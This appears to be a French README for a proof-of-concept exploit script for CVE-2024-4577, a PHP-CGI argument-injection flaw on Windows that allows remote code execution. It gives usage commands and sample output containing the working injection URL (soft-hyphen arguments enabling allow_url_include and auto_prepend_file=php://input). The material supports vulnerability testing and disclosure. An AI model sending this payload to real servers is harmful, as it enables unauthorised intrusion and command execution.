
Preuve de concept d'exploit RCE pour une vulnérabilité critique dans PHP <8.2.15 (Windows), permettant aux attaquants d'exécuter des commandes arbitraires.
Une grave faille de sécurité existe dans le mode CGI de PHP, permettant à des attaquants d'exécuter des commandes arbitraires en manipulant les paramètres d'URL.
Avant d'exécuter le script, assurez-vous que Python 3 est installé sur votre système. De plus, vous avez besoin de la bibliothèque requests pour gérer les requêtes HTTP.
Vous pouvez installer les dépendances requises à l'aide de pip. Si pip n'est pas installé, suivez les instructions ici.
requests :pip install requests
Pour vérifier si une URL cible présente la vulnérabilité CVE-2024-4577, suivez ces étapes :
python3 exploit.py <target>
Par exemple, pour tester l'URL http://example.com, exécutez :
python3 exploit.py http://example.com
Le script testera l'URL cible fournie pour détecter la vulnérabilité et affichera les résultats dans la console. Il indiquera si une vulnérabilité potentielle a été trouvée ou si aucune vulnérabilité n'a été détectée.
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include
Cette vulnérabilité a été découverte par Orange Tsai (@orange_8361)